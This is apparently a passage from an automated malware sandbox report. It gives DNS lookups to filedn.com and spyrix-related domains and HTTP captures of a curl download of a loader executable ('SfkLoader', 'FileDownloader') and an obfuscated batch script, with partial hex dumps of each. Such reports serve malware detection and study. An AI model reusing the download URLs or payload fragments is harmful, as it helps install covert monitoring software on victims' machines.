Preview:	............n.V...Sp..v.ka....!..$.;..%.......6...,.J....'....{I.".K.v:."......fM..Iq..\....S...O..k......../....}...\|......O]}.>.O.6u.a...GK..UE.3..usF..az.m...0.]...&o.[../..Y.L...i...0..U...0....M[.RwBy...8...Orq.>+..H..o:....o.f}t.>lRw...).O....J.3?o.f..jrfu.0mX.K:m....U_..zN.M.([f.#{PWeM.w.\,...V..^...m.q..6u..../O..w..Y...{x.~QVV..w}.}x5\|..q........v..a...J...H...I...~..o..5....._.......G.'.{.=k.F......>...\|..}..T....6....e..TX..K......,g[.S.r..l..\|."..O...-...G...i....`.XhN.....sIb..u...2k..K.i.WW....T.u.7,`.w..R.g.H.\Y.i.G....f.Z...mE...\.}...C>..ZgW.,..E....:gSR...N....,.8.).YV...nU..l;.M."18(...y...d..n.lV..[n.:............p.E[$..:..u.(.y..6.K.ErvR... Yy.....v..f.%..m%I.,....~..]z..W.l.$.E.Y3.L..@.J.:O.4....'S5..Kj....@W..,...N^..}.n....DLz..l....v...J3JJ..o.Q...^R8mY....&..[..<s..7a.Y.<c.r7.xV.N/.WE2...Vo$ci..Z..!../.b_.&.-N.en..7.\|s...#.<.3.\....?.nY..;OVy.gxa....6....zy.t.j..;..V.K.?....m..o...X6.CI

Process:	C:\Windows\SysWOW64\reg.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	243
Entropy (8bit):	5.025903567998292
Encrypted:	false
SSDEEP:	6:rbsd3u6eWFF60OckSi23oH+H1gFyeWFF60OckSi23fksgeWFF60OckSi23fhn:QNFFvO4ZYeVAyNFFvO4ZssgNFFvO4ZZn
MD5:	5F73D6EB745036C1AFF17E55835C42B2
SHA1:	603662F0180E4B5AACD9DCDFB01738C0D29F7A3F
SHA-256:	11C4731706427EC108A02F9FD527EC7DEEA25F012233B5F6EEC8D10F615CB631
SHA-512:	E9B3B307A6CBC6EE6219347ED24246AFE1197CEE2A1AC621C7E8035DD32B9CAB256F80155D66E7580AFEE7022264CEE105EE08A380BE5960C30E26D3E2277E43
Malicious:	false
Reputation:	unknown
Preview:	..HKEY_USERS\S-1-5-19\Environment.. Path REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Microsoft\WindowsApps;.. TEMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp.. TMP REG_EXPAND_SZ %USERPROFILE%\AppData\Local\Temp....

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 2, 2024 06:09:59.607768059 CEST	192.168.2.4	1.1.1.1	0xc54a	Standard query (0)	filedn.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:10:06.424912930 CEST	192.168.2.4	1.1.1.1	0xbf2	Standard query (0)	cdnbaynet.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:10:10.082133055 CEST	192.168.2.4	1.1.1.1	0x39c	Standard query (0)	swtb-download.spyrix-sfk.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:34.894213915 CEST	192.168.2.4	1.1.1.1	0xcca6	Standard query (0)	dashboard.spyrix.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:34.894381046 CEST	192.168.2.4	1.1.1.1	0x6879	Standard query (0)	dashboard.spyrix.com	65	IN (0x0001)	false
Oct 2, 2024 06:11:35.708673000 CEST	192.168.2.4	1.1.1.1	0x9d32	Standard query (0)	cdn.cdndownload.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:35.709037066 CEST	192.168.2.4	1.1.1.1	0x76f5	Standard query (0)	cdn.cdndownload.net	65	IN (0x0001)	false
Oct 2, 2024 06:11:37.551212072 CEST	192.168.2.4	1.1.1.1	0xcfea	Standard query (0)	cdn.cdndownload.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:37.551450968 CEST	192.168.2.4	1.1.1.1	0x8335	Standard query (0)	cdn.cdndownload.net	65	IN (0x0001)	false
Oct 2, 2024 06:11:38.083857059 CEST	192.168.2.4	1.1.1.1	0x12e1	Standard query (0)	dashboard.spyrix.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:38.084290028 CEST	192.168.2.4	1.1.1.1	0x17bf	Standard query (0)	dashboard.spyrix.com	65	IN (0x0001)	false
Oct 2, 2024 06:11:38.494923115 CEST	192.168.2.4	1.1.1.1	0x6b25	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:38.495400906 CEST	192.168.2.4	1.1.1.1	0x8751	Standard query (0)	www.google.com	65	IN (0x0001)	false
Oct 2, 2024 06:11:39.768945932 CEST	192.168.2.4	1.1.1.1	0xbc53	Standard query (0)	spyrix.net	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:12:08.483913898 CEST	192.168.2.4	1.1.1.1	0xeaae	Standard query (0)	spyrix.net	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 2, 2024 06:09:59.636753082 CEST	1.1.1.1	192.168.2.4	0xc54a	No error (0)	filedn.com		23.109.93.100	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:10:06.461412907 CEST	1.1.1.1	192.168.2.4	0xbf2	No error (0)	cdnbaynet.com		167.114.14.170	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:10:10.100588083 CEST	1.1.1.1	192.168.2.4	0x39c	No error (0)	swtb-download.spyrix-sfk.com		167.114.14.168	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:34.906104088 CEST	1.1.1.1	192.168.2.4	0xcca6	No error (0)	dashboard.spyrix.com		158.69.117.119	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:35.757433891 CEST	1.1.1.1	192.168.2.4	0x76f5	No error (0)	cdn.cdndownload.net	cl-e0469d03.edgecdn.ru		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:11:35.766613960 CEST	1.1.1.1	192.168.2.4	0x9d32	No error (0)	cdn.cdndownload.net	cl-e0469d03.edgecdn.ru		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:11:35.766613960 CEST	1.1.1.1	192.168.2.4	0x9d32	No error (0)	cl-e0469d03.edgecdn.ru		95.181.182.182	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:37.589651108 CEST	1.1.1.1	192.168.2.4	0x8335	No error (0)	cdn.cdndownload.net	cl-e0469d03.edgecdn.ru		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:11:37.598234892 CEST	1.1.1.1	192.168.2.4	0xcfea	No error (0)	cdn.cdndownload.net	cl-e0469d03.edgecdn.ru		CNAME (Canonical name)	IN (0x0001)	false
Oct 2, 2024 06:11:37.598234892 CEST	1.1.1.1	192.168.2.4	0xcfea	No error (0)	cl-e0469d03.edgecdn.ru		95.181.182.182	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:38.096101999 CEST	1.1.1.1	192.168.2.4	0x12e1	No error (0)	dashboard.spyrix.com		158.69.117.119	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:38.501802921 CEST	1.1.1.1	192.168.2.4	0x6b25	No error (0)	www.google.com		142.250.185.228	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:11:38.501904964 CEST	1.1.1.1	192.168.2.4	0x8751	No error (0)	www.google.com			65	IN (0x0001)	false
Oct 2, 2024 06:11:39.786730051 CEST	1.1.1.1	192.168.2.4	0xbc53	No error (0)	spyrix.net		158.69.117.119	A (IP address)	IN (0x0001)	false
Oct 2, 2024 06:12:08.515602112 CEST	1.1.1.1	192.168.2.4	0xeaae	No error (0)	spyrix.net		158.69.117.119	A (IP address)	IN (0x0001)	false

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:10:00 UTC	131	OUT	GET /lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404 HTTP/1.1 Host: filedn.com User-Agent: curl/7.83.1 Accept: /
2024-10-02 04:10:00 UTC	392	IN	HTTP/1.1 200 OK Server: CacheHTTPd v1.0 Date: Wed, 02 Oct 2024 04:10:00 +0000 Content-Type: application/octet-stream Content-Length: 90112 Etag: "b17ebb04ce423601b14b45f5c0fd1aa08175298c" Expires: Wed, 02 Oct 2024 10:09:09 +0000 Content-Disposition: attachment; filename="404" Accept-Ranges: bytes Content-Transfer-Encoding: binary Connection: keep-alive Keep-Alive: timeout=30
2024-10-02 04:10:00 UTC	4096	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 57 2d 3e fc 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 50 01 00 00 0e 00 00 00 00 00 00 22 6e 01 00 00 20 00 00 00 80 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELW->"0P"n @ `
2024-10-02 04:10:00 UTC	4096	IN	Data Raw: 01 00 01 00 81 00 10 00 96 08 7d 08 59 00 0b 00 07 00 01 00 10 00 87 08 7d 08 0c 00 10 00 0e 00 01 00 10 00 a5 08 7d 08 0c 00 11 00 14 00 00 00 10 00 ee 08 7d 08 59 00 11 00 18 00 80 01 10 00 d5 06 7d 08 59 00 11 00 1a 00 00 00 10 00 55 0a 7d 08 59 00 11 00 1b 00 00 00 10 00 c8 09 24 0a 59 00 14 00 1d 00 00 01 10 00 55 0a 24 0a a5 00 16 00 22 00 03 01 10 00 15 00 00 00 59 00 17 00 25 00 01 00 b8 08 2a 02 16 00 1c 09 2e 02 11 00 8c 0c 32 02 01 00 45 0b 36 02 01 00 05 0b 39 02 01 00 5a 00 3d 02 06 00 59 08 41 02 06 00 9b 0b 45 02 01 00 4d 00 45 02 01 00 6e 00 45 02 01 00 fb 00 49 02 01 00 69 03 50 02 04 00 9f 01 36 02 04 00 cb 08 36 02 04 00 e6 0b 36 02 01 00 42 09 57 02 36 00 c4 08 36 02 36 00 a6 0b 36 02 36 00 21 06 36 02 11 00 f0 06 5b 02 11 00 2c 03 60 Data Ascii: }Y}}}Y}YU}Y$YU$"Y%*.2E69Z=YAEMEnEIiP666BW66666!6[,`
2024-10-02 04:10:00 UTC	4096	IN	Data Raw: 6f 6c 6c 65 63 74 69 6f 6e 00 57 65 62 48 65 61 64 65 72 43 6f 6c 6c 65 63 74 69 6f 6e 00 73 65 74 5f 53 74 61 72 74 50 6f 73 69 74 69 6f 6e 00 46 6f 72 6d 53 74 61 72 74 50 6f 73 69 74 69 6f 6e 00 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 00 46 69 6c 65 49 6e 66 6f 00 43 75 6c 74 75 72 65 49 6e 66 6f 00 67 65 74 5f 53 74 61 72 74 49 6e 66 6f 00 50 72 6f 63 65 73 73 53 74 61 72 74 49 6e 66 6f 00 44 69 72 65 63 74 6f 72 79 49 6e 66 6f 00 42 69 74 6d 61 70 00 73 65 74 5f 54 61 62 53 74 6f 70 00 50 72 6f 67 72 65 73 73 42 61 72 00 70 72 6f 67 72 65 73 73 42 61 72 00 53 74 72 65 61 6d 52 65 61 64 65 72 00 54 65 78 74 52 65 61 64 65 72 00 53 66 6b 4c 6f 61 64 65 72 00 46 69 6c 65 44 6f 77 6e 6c 6f 61 64 65 72 00 42 61 73 65 44 6f 77 6e 6c 6f 61 64 65 72 00 49 6e Data Ascii: ollectionWebHeaderCollectionset_StartPositionFormStartPositionExceptionRunFileInfoCultureInfoget_StartInfoProcessStartInfoDirectoryInfoBitmapset_TabStopProgressBarprogressBarStreamReaderTextReaderSfkLoaderFileDownloaderBaseDownloaderIn
2024-10-02 04:10:00 UTC	4096	IN	Data Raw: 42 00 77 00 62 00 31 00 37 00 4d 00 4a 00 41 00 35 00 49 00 38 00 49 00 7a 00 63 00 71 00 6d 00 4f 00 76 00 69 00 71 00 69 00 36 00 32 00 51 00 56 00 78 00 46 00 6a 00 5a 00 33 00 37 00 6f 00 4b 00 66 00 6e 00 69 00 50 00 69 00 46 00 6e 00 41 00 4f 00 6f 00 6b 00 6a 00 6a 00 32 00 46 00 65 00 77 00 75 00 42 00 65 00 53 00 52 00 45 00 33 00 4b 00 66 00 4a 00 48 00 69 00 6a 00 42 00 4a 00 55 00 37 00 54 00 78 00 48 00 58 00 6f 00 71 00 34 00 70 00 54 00 52 00 52 00 70 00 76 00 34 00 38 00 45 00 6c 00 49 00 36 00 4a 00 30 00 4f 00 69 00 6f 00 45 00 43 00 34 00 67 00 61 00 6e 00 6e 00 61 00 50 00 6b 00 69 00 51 00 58 00 59 00 47 00 54 00 69 00 6c 00 36 00 77 00 6c 00 65 00 73 00 4f 00 48 00 64 00 37 00 31 00 4d 00 4b 00 47 00 46 00 50 00 62 00 54 00 6d 00 75 Data Ascii: Bwb17MJA5I8IzcqmOviqi62QVxFjZ37oKfniPiFnAOokjj2FewuBeSRE3KfJHijBJU7TxHXoq4pTRRpv48ElI6J0OioEC4gannaPkiQXYGTil6wlesOHd71MKGFPbTmu
2024-10-02 04:10:00 UTC	4096	IN	Data Raw: a1 14 1e ce 5d 6a 07 15 98 5b 52 cc 8d 8e 51 b9 75 2e cd cd 70 1b 60 fc 8f 69 e6 8b a8 f3 4f 2e 41 8c 17 f0 b3 fc 77 2b 2d 64 3e a9 51 71 e7 ba 44 7b 6b 82 bd 23 c9 bb 17 ae 76 32 02 4b e5 49 b9 10 4f 4d e5 aa 70 40 0d 64 db 9e d9 36 ba d5 64 b6 db 87 33 21 76 fb 70 ba 0a 76 e9 80 87 f9 ec cd 09 f6 da 44 ef 9a 38 45 90 4b e6 75 5e 14 ed 77 cf 36 9f d5 99 27 b3 bb b8 f0 a1 4c 8f 5f 26 ae ff 25 dc 45 f7 c9 f6 d0 c9 f2 f8 2e 9e 77 1e 1f f0 3c a8 8b 63 bb 30 db 19 c2 77 3f dc 4c e4 be 2c d6 07 05 6c 25 f4 fe 26 a1 f8 e1 e6 d0 07 db b1 86 d0 07 1b 04 fc 47 db 0e c2 32 3e da 22 fb 00 cb 0f b6 1e f4 21 c7 3b ba 7d b8 01 fb 38 68 e4 e6 3f 87 5b 6a ec 48 cc e5 a3 1d 7f 0a f3 2f 8f 97 dd 04 5f 54 e1 98 df e4 20 e0 d8 47 72 24 dc 78 bc f7 2a fd 84 25 16 f7 e2 91 f0 Data Ascii: ]j[RQu.p`iO.Aw+-d>QqD{k#v2KIOMp@d6d3!vpvD8EKu^w6'L_&%E.w<c0w?L,l%&G2>"!;}8h?[jH/_T Gr$x*%
2024-10-02 04:10:00 UTC	4096	IN	Data Raw: b6 4f ba 91 7c bb 14 c8 dd 72 6c 9c 77 6f ba 16 49 ca 5b 66 a7 34 da ee d9 7e 77 37 f2 f5 8e 54 c2 83 c7 cf 41 09 e7 cf dd f3 92 7b 59 be 83 fc cb 5f fb 03 39 99 f6 15 71 f6 da 78 ff fa 44 8a 3c 9e 77 60 9e d2 60 46 2f 50 da 15 8c 8a b8 21 c9 dc 10 6f 42 e8 f0 cb 39 3b 8e 7f 6b a5 17 00 ee 91 d6 39 70 be 69 da 60 5e 2e 51 9b cc fd a9 5a 53 85 f0 00 7b 70 e6 05 73 bf 93 6f 5f c9 6b 3f 20 f7 2f 53 d7 99 7f 99 62 b4 3a d3 08 c1 24 d8 61 0d fe db 95 f6 ae 14 1f a4 f1 67 50 07 6f ac 41 f2 0d df 45 c1 dd 94 e4 61 08 f7 a7 aa cd f5 c1 2c fb 7e b5 ad 58 2e 05 17 ac 84 44 38 e7 6b c1 da ae 7b 5c 72 2f cb 77 90 7f f9 6b 7f bc fc e2 b9 f6 d2 b9 ea fa 02 ca 4b 62 24 bf 20 f3 37 4a d5 06 07 e7 8b f6 1d e1 5f ef 16 27 0d fd 73 ae c7 49 57 c6 fb 37 25 d8 5b dd a2 66 24 Data Ascii: O\|rlwoI[f4~w7TA{Y_9qxD<w``F/P!oB9;k9pi`^.QZS{pso_k? /Sb:$agPoAEa,~X.D8k{\r/wkKb$ 7J_'sIW7%[f$
2024-10-02 04:10:00 UTC	4096	IN	Data Raw: 67 66 98 51 e9 a6 b2 dd 6c da 7e e0 e7 03 7c 53 af 6d 3b 95 da c1 64 43 a2 cd 53 5f 71 7b 4e 8f 49 e6 8c 48 f1 34 8a fb cd 12 35 a3 fd 23 42 ed 30 c1 d6 95 7f 0a eb 24 b4 6b 2a 32 99 db 04 4d 43 0f 9d 30 4b ed ac 83 0a 6d ff 5c 2d 2c f1 51 95 20 07 69 e4 1b 3f 71 77 8a 36 49 85 cc 1f c8 d4 5c d4 ee e9 fb de ad f2 e5 a5 f7 14 fb 56 bc 49 af 33 cb 37 98 ff 18 e0 79 6d d9 61 aa 97 98 49 79 e6 c5 28 d9 f7 1e 4f 7d 40 8a 96 fa 8b d2 88 e4 b7 2a 7d f2 6a 7c fd a8 19 6a 75 07 75 32 b7 3f 46 68 b6 e9 ef a7 f8 bf 0b d3 8a 12 97 c5 5a 41 4e 2c 47 b5 45 34 d9 94 25 f6 ad 32 43 2c bf 2a 41 fb a9 68 b9 ee 54 ad e1 0a 99 cb c5 9d 97 3f 98 be e7 25 0f 60 79 3c dc be 3a 4f 3d 1c 2b 36 4a 19 fd c7 bc d4 9e b3 ce a6 d5 75 75 d7 1e 58 a7 07 f2 9e 99 f6 fd 05 3e 02 ed d4 d9 Data Ascii: gfQl~\|Sm;dCS_q{NIH45#B0$k2MC0Km\-,Q i?qw6I\VI37ymaIy(O}@}j\|juu2?FhZAN,GE4%2C,*AhT?%`y<:O=+6JuuX>
2024-10-02 04:10:00 UTC	4096	IN	Data Raw: 30 bb 64 1f f7 fe fd 8f 7c 6d de 6e c7 ec eb 10 84 ee 68 b7 70 6d 63 7d c4 54 35 ad 43 d5 b7 a5 f8 7f 15 de e6 b8 d9 c1 aa ae 6a 38 1f 58 64 5f 2b 53 2f e8 a5 31 9a aa d0 b5 1e 3b 5e 4e 86 76 fa 1c b9 38 4a 6f 78 85 f4 39 3c ef 52 73 ad fd 18 db 66 a7 35 d9 47 33 b4 cb 31 a5 4f ac ff c8 be 2e 65 f4 42 94 ed 58 df f5 c0 df bd ea 97 69 3b 8f 3d aa 68 2f cb 43 61 e6 c4 70 ad ce 4c aa f5 54 9e bd 23 c9 fb 6b b8 5b f1 6d 86 a8 fe 64 ad 19 a1 f5 42 8e 9f ae 86 d4 17 8a ed cb a5 de c3 19 6e 6f 95 d3 dd da 40 67 44 7a a0 7e 91 eb 56 79 be 48 83 e5 f8 15 28 fd c9 7c 9b b8 b0 73 6c 8d 79 d0 6d a7 e3 f2 34 d3 1b b9 b1 af 90 e3 e8 e9 df 44 73 c7 b7 f0 45 2d 90 2c ec 51 3f 7b 5f ee 99 64 0e 9f 22 77 ed 93 ed a3 b2 0f 0b 97 5b 1f 39 5d 48 23 d1 00 fe a4 19 e6 98 99 6a Data Ascii: 0d\|mnhpmc}T5Cj8Xd_+S/1;^Nv8Jox9<Rsf5G31O.eBXi;=h/CapLT#k[mdBno@gDz~VyH(\|slym4DsE-,Q?{_d"w[9]H#j
2024-10-02 04:10:00 UTC	4096	IN	Data Raw: cf d2 67 8a 56 03 2b 5a 68 b6 ed d3 40 4a c0 5e b9 d1 84 e5 99 7e d3 bf 8e b5 82 7b 4e 36 f7 cc f2 af 8d 35 57 cd 33 d4 30 31 91 6a 3f 73 8e c1 5f 29 f8 ee 63 d9 9a 2a 7a d4 34 9f 80 ad 0e 31 35 ce 08 7e de 9d af 3b 0b 88 50 22 c7 87 37 24 99 01 c5 6a 3e 21 ff 92 da 0f d7 69 87 45 c8 26 b0 92 a3 23 4c 08 99 fd 69 bd 1d 57 d7 09 81 83 f7 cd 49 ca d0 ee 4e d6 00 c8 a0 c3 b4 47 86 cf 25 f1 f2 c7 72 35 aa 95 42 16 3e a8 50 78 27 2c f2 f3 97 9a f7 aa 0c 3e 1d df 26 6e 8f 68 d2 4c 76 ca ab a5 fe d0 12 f3 6a b9 7d d3 e1 8d 11 bc 5a 06 ea 5e 58 9d 79 33 d9 3c 7a a0 5b 64 ff d7 82 9e 9f 92 6f 16 ad fe d7 dc 7d 67 a7 16 85 7a ed ab 69 4a fa 9f a5 47 b8 b9 37 4a b4 7a 4d bc b6 48 b9 34 c6 c3 d3 08 9a 24 4d e7 46 99 db 53 94 25 5d 14 ed a3 e3 4e 9c ee 66 95 3a d4 8f Data Ascii: gV+Zh@J^~{N65W301j?s_)c*z415~;P"7$j>!iE&#LiWING%r5B>Px',>&nhLvj}Z^Xy3<z[do}gziJG7JzMH4$MFS%]Nf:
2024-10-02 04:10:00 UTC	4096	IN	Data Raw: 95 ce c0 f3 c8 7e c2 79 30 16 19 17 c7 dd 2f d6 5e 38 ea 33 3d 2b 52 5b 5f 41 f5 fc 13 8f 3f 49 46 a0 71 e8 84 70 6c 02 6d 84 0f a3 10 a5 e7 5d b3 7c e8 cd 52 6f 4a 8b 9d da e4 91 68 e1 d6 58 19 24 43 51 23 be eb 40 d3 0c 34 e4 fa 7c 13 8c 77 1b 52 2c ff 9e d5 e2 a7 76 c8 b9 a5 c0 95 8c 09 42 70 25 e2 22 ca 78 30 6c 08 44 b9 5d 7c 14 5c 93 db 65 1f 3c 2a e7 8c a9 01 75 98 40 ee fb f1 02 cd 86 e1 77 90 7e 3c 18 8e 0e d5 c7 b7 db 45 1b ed 86 9d da e7 ae 68 a5 9b 12 fd fe 96 27 73 54 5f 48 fd 98 45 1e 60 73 9c b4 d8 a6 74 48 f6 27 2d 36 13 cb fc 41 51 fe 57 9a be f7 98 62 1e 9a 65 ee 4b d4 52 4a 88 1e d0 95 ec 75 8d 19 38 25 38 c1 e7 bf 9c 60 be f7 72 73 68 50 f1 f7 3f 31 09 ed 76 c5 36 3d 2c e0 dd 18 2f 81 02 33 15 ae f0 b9 6d 04 3c c1 11 e7 41 8e f5 cf 97 Data Ascii: ~y0/^83=+R[_A?IFqplm]\|RoJhX$CQ#@4\|wR,vBp%"x0lD]\|\e<*u@w~<Eh'sT_HE`stH'-6AQWbeKRJu8%8`rshP?1v6=,/3m<A

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:10:03 UTC	111	OUT	GET /lHeD6Etwo8g0FE5cMVwEMkH/rtyRe243ohygdfrEewd234/s108 HTTP/1.1 Host: filedn.com Connection: Keep-Alive
2024-10-02 04:10:03 UTC	393	IN	HTTP/1.1 200 OK Server: CacheHTTPd v1.0 Date: Wed, 02 Oct 2024 04:10:03 +0000 Content-Type: application/octet-stream Content-Length: 13694 Etag: "fb7ce28d56e3905f9e0a3c1b2cf7cf53053950a4" Expires: Wed, 02 Oct 2024 10:10:03 +0000 Content-Disposition: attachment; filename="s108" Accept-Ranges: bytes Content-Transfer-Encoding: binary Connection: keep-alive Keep-Alive: timeout=30
2024-10-02 04:10:03 UTC	4096	IN	Data Raw: 72 65 6d 20 71 68 71 62 63 33 6f 74 73 63 37 66 34 61 7a 35 6a 69 6a 62 65 70 6a 6a 78 30 38 71 71 72 30 36 0d 0a 72 65 6d 20 36 33 69 61 79 35 67 72 69 6a 70 73 77 64 39 76 75 38 61 69 67 78 73 69 39 77 35 75 33 6c 62 61 65 6a 33 66 69 76 6d 74 6d 6a 64 65 77 67 71 6f 33 35 64 6d 61 7a 39 38 6e 73 6d 33 64 6c 6b 66 68 6c 33 62 70 74 75 75 71 78 75 78 77 30 72 70 6e 78 0d 0a 40 65 63 68 6f 20 6f 66 66 0d 0a 72 65 6d 20 32 62 33 30 34 30 33 6e 31 78 70 67 67 69 73 62 67 6d 73 76 6b 65 30 68 78 71 30 32 72 0d 0a 72 65 6d 20 64 67 75 32 68 64 63 79 6d 35 31 31 78 78 63 37 65 33 76 78 36 30 72 78 72 38 6c 65 72 69 63 6c 68 67 31 6b 79 69 35 69 71 67 6f 6f 35 30 77 63 6e 0d 0a 72 65 6d 20 78 6a 6e 39 30 64 6f 6a 69 61 70 35 31 6d 62 74 33 30 30 38 6f 76 72 67 Data Ascii: rem qhqbc3otsc7f4az5jijbepjjx08qqr06rem 63iay5grijpswd9vu8aigxsi9w5u3lbaej3fivmtmjdewgqo35dmaz98nsm3dlkfhl3bptuuqxuxw0rpnx@echo offrem 2b30403n1xpggisbgmsvke0hxq02rrem dgu2hdcym511xxc7e3vx60rxr8lericlhg1kyi5iqgoo50wcnrem xjn90dojiap51mbt3008ovrg
2024-10-02 04:10:03 UTC	4096	IN	Data Raw: 32 30 74 63 6c 6f 6a 68 72 32 30 36 63 66 39 75 71 38 71 61 35 6e 67 35 6b 74 68 36 6c 35 33 63 6c 77 30 6b 31 64 33 33 30 72 69 74 33 6a 66 72 76 38 67 76 30 33 79 66 61 63 32 79 6f 6d 64 0d 0a 74 69 6d 65 6f 75 74 20 31 30 0d 0a 72 65 6d 20 61 62 31 33 69 75 72 66 64 6e 6d 32 6d 69 75 71 6a 73 79 6d 6a 6c 33 38 35 74 67 62 75 6f 75 67 78 39 39 66 64 78 74 32 63 70 72 38 6d 32 32 77 38 67 71 70 68 33 67 31 69 32 69 34 37 61 63 34 67 32 69 6f 76 61 67 36 62 75 61 39 79 79 39 62 78 66 6c 38 64 6f 6b 0d 0a 72 65 6d 20 31 65 77 70 6f 70 35 30 6c 71 6e 72 62 6a 38 33 77 35 6f 35 77 70 6d 78 7a 79 65 6e 39 62 37 36 65 65 78 62 67 6a 39 75 66 78 71 63 37 6e 37 6e 73 30 6e 6d 66 66 61 37 36 30 72 30 7a 78 39 6b 78 73 63 71 30 62 7a 38 72 35 32 7a 7a 67 6b 30 6f Data Ascii: 20tclojhr206cf9uq8qa5ng5kth6l53clw0k1d330rit3jfrv8gv03yfac2yomdtimeout 10rem ab13iurfdnm2miuqjsymjl385tgbuougx99fdxt2cpr8m22w8gqph3g1i2i47ac4g2iovag6bua9yy9bxfl8dokrem 1ewpop50lqnrbj83w5o5wpmxzyen9b76eexbgj9ufxqc7n7ns0nmffa760r0zx9kxscq0bz8r52zzgk0o
2024-10-02 04:10:03 UTC	4096	IN	Data Raw: 67 6a 6a 31 63 35 78 75 76 65 66 74 75 38 78 7a 76 62 66 33 0d 0a 69 66 20 6e 6f 74 20 25 65 72 72 6f 72 6c 65 76 65 6c 25 20 45 51 55 20 30 20 28 0d 0a 72 65 6d 20 36 77 72 39 67 76 69 61 77 74 71 70 74 6e 66 34 68 6d 74 33 6a 6b 71 6e 37 30 74 69 67 7a 78 61 75 67 68 71 32 61 6a 72 73 79 72 72 39 77 62 6f 78 66 39 6f 71 69 63 62 72 33 69 76 79 7a 37 70 71 67 71 66 65 36 38 78 30 63 36 34 72 63 30 79 37 6a 72 30 64 77 6d 6c 30 61 79 64 6b 7a 39 76 65 73 38 73 32 37 6a 6c 6e 39 35 71 68 72 62 65 36 74 30 70 35 0d 0a 72 65 6d 20 35 6c 63 65 75 78 6e 75 6b 36 77 36 6f 66 6f 67 67 39 79 6a 33 6e 30 37 63 39 30 67 69 39 6c 73 6e 69 73 71 62 66 69 69 75 31 78 67 36 6c 68 65 7a 72 62 65 30 72 70 62 63 68 70 63 38 64 36 37 70 39 65 70 35 74 30 30 69 39 68 7a 71 Data Ascii: gjj1c5xuveftu8xzvbf3if not %errorlevel% EQU 0 (rem 6wr9gviawtqptnf4hmt3jkqn70tigzxaughq2ajrsyrr9wboxf9oqicbr3ivyz7pqgqfe68x0c64rc0y7jr0dwml0aydkz9ves8s27jln95qhrbe6t0p5rem 5lceuxnuk6w6ofogg9yj3n07c90gi9lsnisqbfiiu1xg6lhezrbe0rpbchpc8d67p9ep5t00i9hzq
2024-10-02 04:10:03 UTC	1406	IN	Data Raw: 31 6a 30 61 6a 74 78 37 6b 6f 31 67 30 38 6f 34 6a 35 0d 0a 72 65 6d 20 78 36 36 36 30 73 6f 68 34 31 78 74 30 36 39 68 73 62 74 73 76 71 7a 33 33 30 72 33 73 6c 65 72 65 63 37 6a 36 33 65 6b 68 75 77 70 7a 62 35 67 73 6b 73 31 7a 61 62 78 6e 36 79 65 69 30 62 75 79 63 64 79 6a 30 66 75 35 77 30 38 64 64 36 6f 61 64 76 70 32 0d 0a 72 65 6d 20 6d 65 6f 71 31 31 38 34 30 68 6b 78 38 7a 64 38 70 30 7a 78 33 7a 78 78 72 61 78 74 72 32 34 70 68 31 6f 77 76 72 6e 38 6a 70 63 30 35 35 65 33 65 39 32 68 31 30 68 70 32 6f 6b 73 6d 78 74 6f 62 71 68 62 39 6d 6f 34 6d 72 33 36 69 34 38 74 67 34 0d 0a 72 65 6d 20 61 6e 37 30 74 39 73 71 67 78 37 31 36 73 69 79 6d 38 36 32 61 37 76 72 65 61 34 6a 71 69 73 6f 6b 70 35 39 6b 66 77 76 6c 6b 74 75 61 7a 70 71 32 79 62 79 Data Ascii: 1j0ajtx7ko1g08o4j5rem x6660soh41xt069hsbtsvqz330r3slerec7j63ekhuwpzb5gsks1zabxn6yei0buycdyj0fu5w08dd6oadvp2rem 